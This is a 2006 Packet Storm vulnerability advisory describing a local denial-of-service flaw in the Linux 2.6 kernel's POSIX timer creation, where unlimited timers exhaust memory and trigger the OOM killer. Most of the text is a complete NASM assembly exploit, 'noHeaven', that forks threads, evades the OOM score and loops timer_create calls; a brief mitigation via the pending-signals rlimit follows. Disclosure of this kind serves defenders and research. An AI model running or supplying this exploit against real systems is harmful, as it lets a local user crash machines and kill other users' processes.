noHeaven.txt

2006-04-19T00:00:00
ID PACKETSTORM:45601
Type packetstorm
Reporter Maciej Piotr Falkiewicz
Modified 2006-04-19T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Hello.  
I'd like to present one of Linux Kernel vulnerabilities. As far as I  
know, this one affects 2.6.x kernels.  
  
Problem  
- --  
  
The problem lies in sys_timer_create() in Linux/kernel/posix-timers.c.  
Each time user creates a posix timer, some kernel memory is allocated.  
Since count of timers that can be created by user is limited only by  
sigqueue size (ex. 4294967295 in Debian) every local user can exhaust  
all avaible memory which will trigger oom_killer (mm/oom_kill.c). If a  
process itself uses a small amount of memory, it's oom_score will be  
low, so all other processes would be killed.  
  
Exploit  
- --  
  
- --------------8<---------------------  
  
;nasm -f elf noHeaven.asm  
;ld -s -o noHeaven noHeaven.o  
  
section .text  
global _start  
  
count equ 8 ; threads count - do it quicker  
  
_start:  
mov ebx, count  
call create_threads  
jmp done  
_pause:  
mov eax,29  
int 0x80  
ret  
create_threads:  
mov eax,2  
int 0x80  
test eax,eax  
jz consume  
dec ebx  
test ebx,ebx  
jnz create_threads  
ret  
consume:  
setsid: ; so we won't get counted as one thread in oom_killer()  
xor ebx,ebx ; each task will have about 20 oom_score which  
mov eax,66 ; is less than 'init' and others  
int 0x80  
push eax  
loopek:  
mov eax,259  
mov ebx,0  
mov ecx,0  
mov edx,esp  
int 0x80  
jmp loopek  
done:  
xor ebx,ebx  
mov eax,1  
int 0x80  
  
  
- --------------8<--------------------  
  
  
Fix  
- --  
In my opinion the easiest way to defend is to enforce pending signals  
queue size rlimit (ulimit -i).  
  
Vendor notification status  
- --  
Vendor refused to fix this kind of bugs.  
  
  
- --  
Regards,  
fingerout  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.2.2 (GNU/Linux)  
  
iD8DBQFEMwAY3AGvlpYpo4cRApESAJ9PPyZaHz5HExrh15pQdH51I3di+wCfee87  
hqrfQZpKiyqugdZoabAHy9g=  
=9y9Y  
-----END PGP SIGNATURE-----  
`